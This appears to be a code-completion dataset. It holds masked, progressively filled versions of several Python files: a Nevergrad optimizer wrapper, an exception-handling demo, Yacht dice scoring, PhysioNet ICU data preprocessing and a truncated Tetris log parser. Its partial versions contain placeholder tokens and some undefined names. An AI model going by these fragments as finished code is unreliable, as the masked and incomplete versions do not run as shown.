seq_msg = '{} is a sequential method. batch size is set to 1'
cprint(seq_msg.format(self.method), 'y')
assert self.method in self.valid_methods, f'unknown nevergrad method: {self.method}'
self.ng_optimizers = {}
self._sampled = {}
return
@torch.no_grad()
def setup_ng(self, var_manager, budget):
"""
initializes NeverGrad optimizer.
Args
var_manager (VariableManger): instance of the variable manager
budget (int): number of optimization iteration.
"""
for var_name, var_dict in var_manager.variable_info.items():
if var_dict['grad_free'] is False:
continue
if type(var_dict['grad_free']) == tuple:
mu, sigma = var_dict['grad_free']
if mu is None:
mu = np.zeros(var_dict['shape'])
if sigma is None:
sigma = 1.0
cma_opt = CMA(mu, sigma=sigma)
else:
mu = np.zeros(var_dict['shape'])
sigma = 1.0
opt_fn = ng.optimizers.registry[self.method]
p = ng.p.Array(init=mu)
ng_opt = opt_fn(parametrization=p, budget=budget)
self.ng_optimizers[var_dict['var_type'], var_name] = ng_opt
assert len(self.ng_optimizers.keys()
) == 1, 'currently only a single input variable can be optimized via ' + 'Nevergrad but got: {}'.format(
self.ng_optimizers.keys())
return
<mask token>
<mask token>
| <mask token>
class _BaseNevergradOptimizer:
<mask token>
def __init__(self, method):
self.method = method
self.valid_methods = [x[0] for x in ng.optimizers.registry.items()]
self.sequential_methods = ['SQPCMA', 'chainCMAPowell', 'Powell']
self.is_sequential = self.method in self.sequential_methods
if self.is_sequential:
seq_msg = '{} is a sequential method. batch size is set to 1'
cprint(seq_msg.format(self.method), 'y')
assert self.method in self.valid_methods, f'unknown nevergrad method: {self.method}'
self.ng_optimizers = {}
self._sampled = {}
return
@torch.no_grad()
def setup_ng(self, var_manager, budget):
"""
initializes NeverGrad optimizer.
Args
var_manager (VariableManger): instance of the variable manager
budget (int): number of optimization iteration.
"""
for var_name, var_dict in var_manager.variable_info.items():
if var_dict['grad_free'] is False:
continue
if type(var_dict['grad_free']) == tuple:
mu, sigma = var_dict['grad_free']
if mu is None:
mu = np.zeros(var_dict['shape'])
if sigma is None:
sigma = 1.0
cma_opt = CMA(mu, sigma=sigma)
else:
mu = np.zeros(var_dict['shape'])
sigma = 1.0
opt_fn = ng.optimizers.registry[self.method]
p = ng.p.Array(init=mu)
ng_opt = opt_fn(parametrization=p, budget=budget)
self.ng_optimizers[var_dict['var_type'], var_name] = ng_opt
assert len(self.ng_optimizers.keys()
) == 1, 'currently only a single input variable can be optimized via ' + 'Nevergrad but got: {}'.format(
self.ng_optimizers.keys())
return
<mask token>
@torch.no_grad()
def ng_update(self, variables, loss=None, inverted_loss=False):
"""
Updates NG distribution either with the provided loss or loss that
is recomputed.
Args:
variables (dict): a dictionary instance generated from the
variable manager.
loss (array or list): a 1-dimensional array or list consisting of
losses corresponding to each sample. If the loss is not
provided, uses the variables to recompute the loss.
[Default: None]
inverted_loss (bool): if True, the loss is computed after inverting
the generated images back to the original target. For example
this is used to compute the loss on the original target.
[Default: False]
"""
for (var_type, var_name), ng_opt in self.ng_optimizers.items():
ng_data = self._sampled[var_type, var_name]
if loss is None:
out, loss, _ = self.step(variables, optimize=False)
if inverted_loss and hasattr(variables, 'transform'):
target_type = self.var_manager.variable_info['target'][
'var_type']
weight_type = self.var_manager.variable_info['weight'][
'var_type']
target = self.var_manager.variable_info['target']['default']
weight = self.var_manager.variable_info['weight']['default']
target = target.unsqueeze(0).type_as(out)
weight = weight.unsqueeze(0).type_as(out)
t_fn = self.transform_fns['target']['fn']
t_param = torch.stack(variables.transform.t.data)
out = t_fn(out, t_param, invert=True)
loss = self.loss_fn(out, target, binarize(weight))
loss = loss.cpu().detach().numpy()
for d, l in zip(ng_data, loss):
ng_opt.tell(d, l)
return
| <mask token>
class _BaseNevergradOptimizer:
<mask token>
def __init__(self, method):
self.method = method
self.valid_methods = [x[0] for x in ng.optimizers.registry.items()]
self.sequential_methods = ['SQPCMA', 'chainCMAPowell', 'Powell']
self.is_sequential = self.method in self.sequential_methods
if self.is_sequential:
seq_msg = '{} is a sequential method. batch size is set to 1'
cprint(seq_msg.format(self.method), 'y')
assert self.method in self.valid_methods, f'unknown nevergrad method: {self.method}'
self.ng_optimizers = {}
self._sampled = {}
return
@torch.no_grad()
def setup_ng(self, var_manager, budget):
"""
initializes NeverGrad optimizer.
Args
var_manager (VariableManger): instance of the variable manager
budget (int): number of optimization iteration.
"""
for var_name, var_dict in var_manager.variable_info.items():
if var_dict['grad_free'] is False:
continue
if type(var_dict['grad_free']) == tuple:
mu, sigma = var_dict['grad_free']
if mu is None:
mu = np.zeros(var_dict['shape'])
if sigma is None:
sigma = 1.0
cma_opt = CMA(mu, sigma=sigma)
else:
mu = np.zeros(var_dict['shape'])
sigma = 1.0
opt_fn = ng.optimizers.registry[self.method]
p = ng.p.Array(init=mu)
ng_opt = opt_fn(parametrization=p, budget=budget)
self.ng_optimizers[var_dict['var_type'], var_name] = ng_opt
assert len(self.ng_optimizers.keys()
) == 1, 'currently only a single input variable can be optimized via ' + 'Nevergrad but got: {}'.format(
self.ng_optimizers.keys())
return
@torch.no_grad()
def ng_init(self, var_manager, num_samples):
"""
Args
var_manager (VariableManger): instance of the variable manager
num_samples (int): number of samples for mini-batch optimization
"""
if self.is_sequential:
vars = var_manager.initialize(num_seeds=1)
num_samples = 1
else:
vars = var_manager.initialize(num_samples=num_samples)
for (var_type, var_name), ng_opt in self.ng_optimizers.items():
ng_data = [ng_opt.ask() for _ in range(num_samples)]
_ng_data = np.concatenate([x.args for x in ng_data])
for i, d in enumerate(_ng_data):
vars[var_type][var_name].data[i].data = torch.Tensor(d
).data.type_as(vars[var_type][var_name].data[i].data)
self._sampled[var_type, var_name] = ng_data
return vars
@torch.no_grad()
def ng_update(self, variables, loss=None, inverted_loss=False):
"""
Updates NG distribution either with the provided loss or loss that
is recomputed.
Args:
variables (dict): a dictionary instance generated from the
variable manager.
loss (array or list): a 1-dimensional array or list consisting of
losses corresponding to each sample. If the loss is not
provided, uses the variables to recompute the loss.
[Default: None]
inverted_loss (bool): if True, the loss is computed after inverting
the generated images back to the original target. For example
this is used to compute the loss on the original target.
[Default: False]
"""
for (var_type, var_name), ng_opt in self.ng_optimizers.items():
ng_data = self._sampled[var_type, var_name]
if loss is None:
out, loss, _ = self.step(variables, optimize=False)
if inverted_loss and hasattr(variables, 'transform'):
target_type = self.var_manager.variable_info['target'][
'var_type']
weight_type = self.var_manager.variable_info['weight'][
'var_type']
target = self.var_manager.variable_info['target']['default']
weight = self.var_manager.variable_info['weight']['default']
target = target.unsqueeze(0).type_as(out)
weight = weight.unsqueeze(0).type_as(out)
t_fn = self.transform_fns['target']['fn']
t_param = torch.stack(variables.transform.t.data)
out = t_fn(out, t_param, invert=True)
loss = self.loss_fn(out, target, binarize(weight))
loss = loss.cpu().detach().numpy()
for d, l in zip(ng_data, loss):
ng_opt.tell(d, l)
return
| <mask token>
class _BaseNevergradOptimizer:
"""
Base template for NeverGrad optimization. Should be used jointly with
BaseOptimizer.
For full list of available optimizers
> https://github.com/facebookresearch/nevergrad
or ...
> print(self.valid_methods)
Args:
method: nevergrad optimization method
NOTE:
nevergrad CMA have been observed to perform wrose than the original
codebase. use with warning. nevergrad has a perk of being optimized
in parallel, hence batch-size can be arbitrarily chosen.
"""
def __init__(self, method):
self.method = method
self.valid_methods = [x[0] for x in ng.optimizers.registry.items()]
self.sequential_methods = ['SQPCMA', 'chainCMAPowell', 'Powell']
self.is_sequential = self.method in self.sequential_methods
if self.is_sequential:
seq_msg = '{} is a sequential method. batch size is set to 1'
cprint(seq_msg.format(self.method), 'y')
assert self.method in self.valid_methods, f'unknown nevergrad method: {self.method}'
self.ng_optimizers = {}
self._sampled = {}
return
@torch.no_grad()
def setup_ng(self, var_manager, budget):
"""
initializes NeverGrad optimizer.
Args
var_manager (VariableManger): instance of the variable manager
budget (int): number of optimization iteration.
"""
for var_name, var_dict in var_manager.variable_info.items():
if var_dict['grad_free'] is False:
continue
if type(var_dict['grad_free']) == tuple:
mu, sigma = var_dict['grad_free']
if mu is None:
mu = np.zeros(var_dict['shape'])
if sigma is None:
sigma = 1.0
cma_opt = CMA(mu, sigma=sigma)
else:
mu = np.zeros(var_dict['shape'])
sigma = 1.0
opt_fn = ng.optimizers.registry[self.method]
p = ng.p.Array(init=mu)
ng_opt = opt_fn(parametrization=p, budget=budget)
self.ng_optimizers[var_dict['var_type'], var_name] = ng_opt
assert len(self.ng_optimizers.keys()
) == 1, 'currently only a single input variable can be optimized via ' + 'Nevergrad but got: {}'.format(
self.ng_optimizers.keys())
return
@torch.no_grad()
def ng_init(self, var_manager, num_samples):
"""
Args
var_manager (VariableManger): instance of the variable manager
num_samples (int): number of samples for mini-batch optimization
"""
if self.is_sequential:
vars = var_manager.initialize(num_seeds=1)
num_samples = 1
else:
vars = var_manager.initialize(num_samples=num_samples)
for (var_type, var_name), ng_opt in self.ng_optimizers.items():
ng_data = [ng_opt.ask() for _ in range(num_samples)]
_ng_data = np.concatenate([x.args for x in ng_data])
for i, d in enumerate(_ng_data):
vars[var_type][var_name].data[i].data = torch.Tensor(d
).data.type_as(vars[var_type][var_name].data[i].data)
self._sampled[var_type, var_name] = ng_data
return vars
@torch.no_grad()
def ng_update(self, variables, loss=None, inverted_loss=False):
"""
Updates NG distribution either with the provided loss or loss that
is recomputed.
Args:
variables (dict): a dictionary instance generated from the
variable manager.
loss (array or list): a 1-dimensional array or list consisting of
losses corresponding to each sample. If the loss is not
provided, uses the variables to recompute the loss.
[Default: None]
inverted_loss (bool): if True, the loss is computed after inverting
the generated images back to the original target. For example
this is used to compute the loss on the original target.
[Default: False]
"""
for (var_type, var_name), ng_opt in self.ng_optimizers.items():
ng_data = self._sampled[var_type, var_name]
if loss is None:
out, loss, _ = self.step(variables, optimize=False)
if inverted_loss and hasattr(variables, 'transform'):
target_type = self.var_manager.variable_info['target'][
'var_type']
weight_type = self.var_manager.variable_info['weight'][
'var_type']
target = self.var_manager.variable_info['target']['default']
weight = self.var_manager.variable_info['weight']['default']
target = target.unsqueeze(0).type_as(out)
weight = weight.unsqueeze(0).type_as(out)
t_fn = self.transform_fns['target']['fn']
t_param = torch.stack(variables.transform.t.data)
out = t_fn(out, t_param, invert=True)
loss = self.loss_fn(out, target, binarize(weight))
loss = loss.cpu().detach().numpy()
for d, l in zip(ng_data, loss):
ng_opt.tell(d, l)
return
| import nevergrad as ng
import numpy as np
import torch
from pix2latent.utils.image import binarize
class _BaseNevergradOptimizer():
"""
Base template for NeverGrad optimization. Should be used jointly with
BaseOptimizer.
For full list of available optimizers
> https://github.com/facebookresearch/nevergrad
or ...
> print(self.valid_methods)
Args:
method: nevergrad optimization method
NOTE:
nevergrad CMA have been observed to perform wrose than the original
codebase. use with warning. nevergrad has a perk of being optimized
in parallel, hence batch-size can be arbitrarily chosen.
"""
def __init__(self, method):
self.method = method
self.valid_methods = [x[0] for x in ng.optimizers.registry.items()]
# this is not an exhaustive list
self.sequential_methods = ['SQPCMA', 'chainCMAPowell', 'Powell']
self.is_sequential = self.method in self.sequential_methods
if self.is_sequential:
seq_msg = '{} is a sequential method. batch size is set to 1'
cprint(seq_msg.format(self.method), 'y')
assert self.method in self.valid_methods, \
f'unknown nevergrad method: {self.method}'
self.ng_optimizers = {}
self._sampled = {}
return
@torch.no_grad()
def setup_ng(self, var_manager, budget):
"""
initializes NeverGrad optimizer.
Args
var_manager (VariableManger): instance of the variable manager
budget (int): number of optimization iteration.
"""
for var_name, var_dict in var_manager.variable_info.items():
if var_dict['grad_free'] is False:
continue
if type(var_dict['grad_free']) == tuple:
mu, sigma = var_dict['grad_free']
if mu is None:
mu = np.zeros(var_dict['shape'])
if sigma is None:
sigma = 1.
cma_opt = CMA(mu, sigma=sigma)
else:
mu = np.zeros(var_dict['shape'])
sigma = 1.0
opt_fn = ng.optimizers.registry[self.method]
p = ng.p.Array(init=mu)#.set_mutation(sigma=sigma)
ng_opt = opt_fn(parametrization=p, budget=budget)
self.ng_optimizers[(var_dict['var_type'], var_name)] = ng_opt
assert len(self.ng_optimizers.keys()) == 1, \
'currently only a single input variable can be optimized via '+\
'Nevergrad but got: {}'.format(self.ng_optimizers.keys())
return
@torch.no_grad()
def ng_init(self, var_manager, num_samples):
"""
Args
var_manager (VariableManger): instance of the variable manager
num_samples (int): number of samples for mini-batch optimization
"""
if self.is_sequential:
vars = var_manager.initialize(num_seeds=1)
num_samples = 1
else:
vars = var_manager.initialize(num_samples=num_samples)
for (var_type, var_name), ng_opt in self.ng_optimizers.items():
ng_data = [ng_opt.ask() for _ in range(num_samples)]
_ng_data = np.concatenate([x.args for x in ng_data])
for i, d in enumerate(_ng_data):
vars[var_type][var_name].data[i].data = \
torch.Tensor(d).data.type_as(
vars[var_type][var_name].data[i].data)
self._sampled[(var_type, var_name)] = ng_data
return vars
@torch.no_grad()
def ng_update(self, variables, loss=None, inverted_loss=False):
"""
Updates NG distribution either with the provided loss or loss that
is recomputed.
Args:
variables (dict): a dictionary instance generated from the
variable manager.
loss (array or list): a 1-dimensional array or list consisting of
losses corresponding to each sample. If the loss is not
provided, uses the variables to recompute the loss.
[Default: None]
inverted_loss (bool): if True, the loss is computed after inverting
the generated images back to the original target. For example
this is used to compute the loss on the original target.
[Default: False]
"""
for (var_type, var_name), ng_opt in self.ng_optimizers.items():
ng_data = self._sampled[(var_type, var_name)]
if loss is None:
out, loss, _ = self.step(variables, optimize=False)
if inverted_loss and hasattr(variables, 'transform'):
target_type = \
self.var_manager.variable_info['target']['var_type']
weight_type = \
self.var_manager.variable_info['weight']['var_type']
target = self.var_manager.variable_info['target']['default']
weight = self.var_manager.variable_info['weight']['default']
target = target.unsqueeze(0).type_as(out)
weight = weight.unsqueeze(0).type_as(out)
t_fn = self.transform_fns['target']['fn']
t_param = torch.stack(variables.transform.t.data)
out = t_fn(out, t_param, invert=True)
loss = self.loss_fn(out, target, binarize(weight))
loss = loss.cpu().detach().numpy()
for d, l in zip(ng_data, loss):
ng_opt.tell(d, l)
return
| [
3,
4,
5,
6,
8
] |
624 | 1bf79319613ca1454f3a9ed21068bd899616395c | <mask token>
| <mask token>
try:
print(int(s) + 1)
print(int(s) / 1)
except ValueError as ve:
print('ValueError occurs!!!', ve)
except ZeroDivisionError as e:
print('ValueError occurs!!!', e)
except:
print('Error occurs!!!')
else:
print('elseeeeeeeeeeeeeee')
finally:
print('ABCDEFG')
| s = '123'
try:
print(int(s) + 1)
print(int(s) / 1)
except ValueError as ve:
print('ValueError occurs!!!', ve)
except ZeroDivisionError as e:
print('ValueError occurs!!!', e)
except:
print('Error occurs!!!')
else:
print('elseeeeeeeeeeeeeee')
finally:
print('ABCDEFG')
| #-*- coding: utf-8 -*-
s = "123"
try:
print(int(s) + 1)
print(int(s) / 1)
except ValueError as ve:
print("ValueError occurs!!!", ve)
except ZeroDivisionError as e:
print("ValueError occurs!!!", e)
except :
print("Error occurs!!!")
else:
print("elseeeeeeeeeeeeeee")
finally:
print("ABCDEFG")
# try:
# # 예외 발생 가능 코드들
# except:
# # 예외시 처리될 구문
# except:
# pass #씹겠다?!
# else:
# #예외가 없을 경우 실행되는 부분
# finally:
# #예외가 있던 없던 실행되는 부분 | null | [
0,
1,
2,
3
] |
625 | 40bc8122d98d407341a56251f9abfab019e0acd8 | <mask token>
| <mask token>
class Category(Enum):
ONES = 1
TWOS = 2
THREES = 3
FOURS = 4
FIVES = 5
SIXES = 6
YACHT = auto()
FULL_HOUSE = auto()
FOUR_OF_A_KIND = auto()
LITTLE_STRAIGHT = auto()
BIG_STRAIGHT = auto()
CHOICE = auto()
<mask token>
| <mask token>
class Category(Enum):
ONES = 1
TWOS = 2
THREES = 3
FOURS = 4
FIVES = 5
SIXES = 6
YACHT = auto()
FULL_HOUSE = auto()
FOUR_OF_A_KIND = auto()
LITTLE_STRAIGHT = auto()
BIG_STRAIGHT = auto()
CHOICE = auto()
def score(dice, category):
die_counts = Counter(dice)
if category.value in range(1, 7):
return sum(d for d in dice if d == category.value)
if category is Category.YACHT:
return 50 if len(die_counts) == 1 else 0
if category is Category.CHOICE:
return sum(dice)
if category is Category.BIG_STRAIGHT:
return 30 if 1 not in die_counts and len(die_counts) == 5 else 0
if category is Category.LITTLE_STRAIGHT:
return 30 if 6 not in die_counts and len(die_counts) == 5 else 0
if category is Category.FULL_HOUSE:
return sum(dice) if len(die_counts) == 2 and 3 in die_counts.values(
) else 0
if category is Category.FOUR_OF_A_KIND:
four_die = [d for d, c in die_counts.items() if c >= 4]
return four_die[0] * 4 if four_die else 0
| from collections import Counter
from enum import auto, Enum
class Category(Enum):
ONES = 1
TWOS = 2
THREES = 3
FOURS = 4
FIVES = 5
SIXES = 6
YACHT = auto()
FULL_HOUSE = auto()
FOUR_OF_A_KIND = auto()
LITTLE_STRAIGHT = auto()
BIG_STRAIGHT = auto()
CHOICE = auto()
def score(dice, category):
die_counts = Counter(dice)
if category.value in range(1, 7):
return sum(d for d in dice if d == category.value)
if category is Category.YACHT:
return 50 if len(die_counts) == 1 else 0
if category is Category.CHOICE:
return sum(dice)
if category is Category.BIG_STRAIGHT:
return 30 if 1 not in die_counts and len(die_counts) == 5 else 0
if category is Category.LITTLE_STRAIGHT:
return 30 if 6 not in die_counts and len(die_counts) == 5 else 0
if category is Category.FULL_HOUSE:
return sum(dice) if len(die_counts) == 2 and 3 in die_counts.values(
) else 0
if category is Category.FOUR_OF_A_KIND:
four_die = [d for d, c in die_counts.items() if c >= 4]
return four_die[0] * 4 if four_die else 0
| null | [
0,
2,
3,
4
] |
626 | 3e07a2a2d0a810c016720fa41d71d0771cbccfef | <mask token>
def inv_list(l, start=0):
d = {}
for i in range(len(l)):
d[l[i]] = i + start
return d
<mask token>
def read_dataset(d):
ts = []
pbar = tqdm(os.listdir(raw_data_path + '/set-' + d), desc=
'Reading time series set ' + d)
for f in pbar:
data = pd.read_csv(raw_data_path + '/set-' + d + '/' + f).iloc[1:]
data = data.loc[data.Parameter.notna()]
if len(data) <= 5:
continue
data = data.loc[data.Value >= 0]
data['RecordID'] = f[:-4]
ts.append(data)
ts = pd.concat(ts)
return ts
<mask token>
| <mask token>
def inv_list(l, start=0):
d = {}
for i in range(len(l)):
d[l[i]] = i + start
return d
<mask token>
def read_dataset(d):
ts = []
pbar = tqdm(os.listdir(raw_data_path + '/set-' + d), desc=
'Reading time series set ' + d)
for f in pbar:
data = pd.read_csv(raw_data_path + '/set-' + d + '/' + f).iloc[1:]
data = data.loc[data.Parameter.notna()]
if len(data) <= 5:
continue
data = data.loc[data.Value >= 0]
data['RecordID'] = f[:-4]
ts.append(data)
ts = pd.concat(ts)
return ts
<mask token>
ts.rename(columns={'Time': 'hour', 'Parameter': 'variable', 'Value':
'value'}, inplace=True)
<mask token>
oc.rename(columns={'Length_of_stay': 'length_of_stay', 'In-hospital_death':
'in_hospital_mortality'}, inplace=True)
<mask token>
ts.drop(columns='RecordID', inplace=True)
oc.drop(columns='RecordID', inplace=True)
<mask token>
for val in [4, 3, 2, 1]:
kk = ii & (ts.value == val)
ts.loc[kk, 'variable'] = 'ICUType_' + str(val)
<mask token>
np.random.seed(123)
np.random.shuffle(train_valid_ind)
<mask token>
oc.drop(columns='subset', inplace=True)
pickle.dump([ts, oc, train_ind, valid_ind, test_ind], open(
'physionet_2012_preprocessed.pkl', 'wb'))
| <mask token>
def inv_list(l, start=0):
d = {}
for i in range(len(l)):
d[l[i]] = i + start
return d
raw_data_path = '/home/reddy/sindhu/datasets/physionet_2012/'
def read_dataset(d):
ts = []
pbar = tqdm(os.listdir(raw_data_path + '/set-' + d), desc=
'Reading time series set ' + d)
for f in pbar:
data = pd.read_csv(raw_data_path + '/set-' + d + '/' + f).iloc[1:]
data = data.loc[data.Parameter.notna()]
if len(data) <= 5:
continue
data = data.loc[data.Value >= 0]
data['RecordID'] = f[:-4]
ts.append(data)
ts = pd.concat(ts)
return ts
ts = pd.concat((read_dataset('a'), read_dataset('b'), read_dataset('c')))
ts.Time = ts.Time.apply(lambda x: int(x[:2]) + int(x[3:]) / 60)
ts.rename(columns={'Time': 'hour', 'Parameter': 'variable', 'Value':
'value'}, inplace=True)
oc_a = pd.read_csv(raw_data_path + '/Outcomes-a.txt', usecols=['RecordID',
'Length_of_stay', 'In-hospital_death'])
oc_a['subset'] = 'a'
oc_b = pd.read_csv(raw_data_path + '/Outcomes-b.txt', usecols=['RecordID',
'Length_of_stay', 'In-hospital_death'])
oc_b['subset'] = 'b'
oc_c = pd.read_csv(raw_data_path + '/Outcomes-c.txt', usecols=['RecordID',
'Length_of_stay', 'In-hospital_death'])
oc_c['subset'] = 'c'
oc = pd.concat((oc_a, oc_b, oc_c))
oc.RecordID = oc.RecordID.astype(str)
oc.rename(columns={'Length_of_stay': 'length_of_stay', 'In-hospital_death':
'in_hospital_mortality'}, inplace=True)
rec_ids = sorted(list(ts.RecordID.unique()))
rid_to_ind = inv_list(rec_ids)
oc = oc.loc[oc.RecordID.isin(rec_ids)]
ts['ts_ind'] = ts.RecordID.map(rid_to_ind)
oc['ts_ind'] = oc.RecordID.map(rid_to_ind)
ts.drop(columns='RecordID', inplace=True)
oc.drop(columns='RecordID', inplace=True)
ts = ts.drop_duplicates()
ii = ts.variable == 'ICUType'
for val in [4, 3, 2, 1]:
kk = ii & (ts.value == val)
ts.loc[kk, 'variable'] = 'ICUType_' + str(val)
ts.loc[ii, 'value'] = 1
means_stds = ts.groupby('variable').agg({'value': ['mean', 'std']})
means_stds.columns = [col[1] for col in means_stds.columns]
means_stds.loc[means_stds['std'] == 0, 'std'] = 1
ts = ts.merge(means_stds.reset_index(), on='variable', how='left')
ii = ts.variable.apply(lambda x: not x.startswith('ICUType')
) & ~ts.variable.isin(['Age', 'Gender', 'Height'])
ts.loc[ii, 'value'] = (ts.loc[ii, 'value'] - ts.loc[ii, 'mean']) / ts.loc[
ii, 'std']
train_valid_ind = np.array(oc.loc[oc.subset != 'a'].ts_ind)
np.random.seed(123)
np.random.shuffle(train_valid_ind)
bp = int(0.8 * len(train_valid_ind))
train_ind = train_valid_ind[:bp]
valid_ind = train_valid_ind[bp:]
test_ind = np.array(oc.loc[oc.subset == 'a'].ts_ind)
oc.drop(columns='subset', inplace=True)
pickle.dump([ts, oc, train_ind, valid_ind, test_ind], open(
'physionet_2012_preprocessed.pkl', 'wb'))
| from tqdm import tqdm
import os
import pandas as pd
import pickle
import numpy as np
def inv_list(l, start=0):
d = {}
for i in range(len(l)):
d[l[i]] = i + start
return d
raw_data_path = '/home/reddy/sindhu/datasets/physionet_2012/'
def read_dataset(d):
ts = []
pbar = tqdm(os.listdir(raw_data_path + '/set-' + d), desc=
'Reading time series set ' + d)
for f in pbar:
data = pd.read_csv(raw_data_path + '/set-' + d + '/' + f).iloc[1:]
data = data.loc[data.Parameter.notna()]
if len(data) <= 5:
continue
data = data.loc[data.Value >= 0]
data['RecordID'] = f[:-4]
ts.append(data)
ts = pd.concat(ts)
return ts
ts = pd.concat((read_dataset('a'), read_dataset('b'), read_dataset('c')))
ts.Time = ts.Time.apply(lambda x: int(x[:2]) + int(x[3:]) / 60)
ts.rename(columns={'Time': 'hour', 'Parameter': 'variable', 'Value':
'value'}, inplace=True)
oc_a = pd.read_csv(raw_data_path + '/Outcomes-a.txt', usecols=['RecordID',
'Length_of_stay', 'In-hospital_death'])
oc_a['subset'] = 'a'
oc_b = pd.read_csv(raw_data_path + '/Outcomes-b.txt', usecols=['RecordID',
'Length_of_stay', 'In-hospital_death'])
oc_b['subset'] = 'b'
oc_c = pd.read_csv(raw_data_path + '/Outcomes-c.txt', usecols=['RecordID',
'Length_of_stay', 'In-hospital_death'])
oc_c['subset'] = 'c'
oc = pd.concat((oc_a, oc_b, oc_c))
oc.RecordID = oc.RecordID.astype(str)
oc.rename(columns={'Length_of_stay': 'length_of_stay', 'In-hospital_death':
'in_hospital_mortality'}, inplace=True)
rec_ids = sorted(list(ts.RecordID.unique()))
rid_to_ind = inv_list(rec_ids)
oc = oc.loc[oc.RecordID.isin(rec_ids)]
ts['ts_ind'] = ts.RecordID.map(rid_to_ind)
oc['ts_ind'] = oc.RecordID.map(rid_to_ind)
ts.drop(columns='RecordID', inplace=True)
oc.drop(columns='RecordID', inplace=True)
ts = ts.drop_duplicates()
ii = ts.variable == 'ICUType'
for val in [4, 3, 2, 1]:
kk = ii & (ts.value == val)
ts.loc[kk, 'variable'] = 'ICUType_' + str(val)
ts.loc[ii, 'value'] = 1
means_stds = ts.groupby('variable').agg({'value': ['mean', 'std']})
means_stds.columns = [col[1] for col in means_stds.columns]
means_stds.loc[means_stds['std'] == 0, 'std'] = 1
ts = ts.merge(means_stds.reset_index(), on='variable', how='left')
ii = ts.variable.apply(lambda x: not x.startswith('ICUType')
) & ~ts.variable.isin(['Age', 'Gender', 'Height'])
ts.loc[ii, 'value'] = (ts.loc[ii, 'value'] - ts.loc[ii, 'mean']) / ts.loc[
ii, 'std']
train_valid_ind = np.array(oc.loc[oc.subset != 'a'].ts_ind)
np.random.seed(123)
np.random.shuffle(train_valid_ind)
bp = int(0.8 * len(train_valid_ind))
train_ind = train_valid_ind[:bp]
valid_ind = train_valid_ind[bp:]
test_ind = np.array(oc.loc[oc.subset == 'a'].ts_ind)
oc.drop(columns='subset', inplace=True)
pickle.dump([ts, oc, train_ind, valid_ind, test_ind], open(
'physionet_2012_preprocessed.pkl', 'wb'))
| from tqdm import tqdm
import os
import pandas as pd
import pickle
import numpy as np
def inv_list(l, start=0):
d = {}
for i in range(len(l)):
d[l[i]] = i+start
return d
raw_data_path = '/home/reddy/sindhu/datasets/physionet_2012/'
def read_dataset(d):
ts = []
pbar = tqdm(os.listdir(raw_data_path+'/set-'+d), desc='Reading time series set '+d)
for f in pbar:
data = pd.read_csv(raw_data_path+'/set-'+d+'/'+f).iloc[1:]
data = data.loc[data.Parameter.notna()]
if len(data)<=5:
continue
data = data.loc[data.Value>=0] # neg Value indicates missingness.
data['RecordID'] = f[:-4]
ts.append(data)
ts = pd.concat(ts)
return ts
ts = pd.concat((read_dataset('a'), read_dataset('b'), read_dataset('c')))
ts.Time = ts.Time.apply(lambda x:int(x[:2])+int(x[3:])/60) # No. of hours since admission.
ts.rename(columns={'Time':'hour', 'Parameter':'variable', 'Value':'value'}, inplace=True)
oc_a = pd.read_csv(raw_data_path+'/Outcomes-a.txt', usecols=['RecordID', 'Length_of_stay', 'In-hospital_death'])
oc_a['subset'] = 'a'
oc_b = pd.read_csv(raw_data_path+'/Outcomes-b.txt', usecols=['RecordID', 'Length_of_stay', 'In-hospital_death'])
oc_b['subset'] = 'b'
oc_c = pd.read_csv(raw_data_path+'/Outcomes-c.txt', usecols=['RecordID', 'Length_of_stay', 'In-hospital_death'])
oc_c['subset'] = 'c'
oc = pd.concat((oc_a,oc_b,oc_c))
oc.RecordID = oc.RecordID.astype(str)
oc.rename(columns={'Length_of_stay':'length_of_stay', 'In-hospital_death':'in_hospital_mortality'}, inplace=True)
rec_ids = sorted(list(ts.RecordID.unique()))
rid_to_ind = inv_list(rec_ids)
oc = oc.loc[oc.RecordID.isin(rec_ids)]
ts['ts_ind'] = ts.RecordID.map(rid_to_ind)
oc['ts_ind'] = oc.RecordID.map(rid_to_ind)
ts.drop(columns='RecordID', inplace=True)
oc.drop(columns='RecordID', inplace=True)
# Drop duplicates.
ts = ts.drop_duplicates()
# Convert categorical to numeric.
ii = (ts.variable=='ICUType')
for val in [4,3,2,1]:
kk = ii&(ts.value==val)
ts.loc[kk, 'variable'] = 'ICUType_'+str(val)
ts.loc[ii, 'value'] = 1
# Normalize data except Age, Gender, Height, ICUType.
means_stds = ts.groupby('variable').agg({'value':['mean', 'std']})
means_stds.columns = [col[1] for col in means_stds.columns]
means_stds.loc[means_stds['std']==0, 'std'] = 1
ts = ts.merge(means_stds.reset_index(), on='variable', how='left')
ii = ts.variable.apply(lambda x:not(x.startswith('ICUType')))&(~ts.variable.isin(['Age', 'Gender', 'Height']))
ts.loc[ii, 'value'] = (ts.loc[ii, 'value']-ts.loc[ii, 'mean'])/ts.loc[ii, 'std']
# Generate split.
train_valid_ind = np.array(oc.loc[oc.subset!='a'].ts_ind)
np.random.seed(123)
np.random.shuffle(train_valid_ind)
bp = int(0.8*len(train_valid_ind))
train_ind = train_valid_ind[:bp]
valid_ind = train_valid_ind[bp:]
test_ind = np.array(oc.loc[oc.subset=='a'].ts_ind)
oc.drop(columns='subset', inplace=True)
# Store data.
pickle.dump([ts, oc, train_ind, valid_ind, test_ind], open('physionet_2012_preprocessed.pkl','wb'))
| [
2,
3,
4,
5,
6
] |
627 | 3668e8009dca4ea261bdfbd325331c338fdac5a9 | <mask token>
class StatusParser:
def __init__(self):
self.board = np.memmap('../tmp/board', mode='r', dtype=np.int8,
shape=(20, 10))
self.combo = np.memmap('../tmp/combo', mode='r', dtype=np.int32,
shape=(1,))
self.lines = np.memmap('../tmp/lines', mode='r', dtype=np.int32,
shape=(1,))
self.score = np.memmap('../tmp/score', mode='r', dtype=np.int32,
shape=(1,))
self.line_stats = np.memmap('../tmp/line_stats', mode='r', dtype=np
.int32, shape=(4,))
class Parser:
def __init__(self, filename):
self.filename = filename
self.last_update = -1
def check_update(self):
latest_update = os.path.getmtime(self.filename)
if latest_update > self.last_update:
self.last_update = latest_update
self.parse()
return True
return False
def parse(self):
score_re = (
'Episode:\\s*(?P<episode>\\d*)\\s*Score:\\s*(?P<score>\\d*)\\s*Lines Cleared:\\s*(?P<lines>\\d*)'
)
train_re = (
'Iteration:\\s*(?P<iter>\\d*)\\s*training loss:\\s*(?P<t_loss>\\d*\\.\\d*)\\s*validation loss:\\s*(?P<v_loss>\\d*\\.\\d*)±\\s*(?P<v_loss_err>\\d*\\.\\d*|nan)\\s*gradient norm:\\s*(?P<g_norm>\\d*\\.\\d*)'
)
datasize_re = (
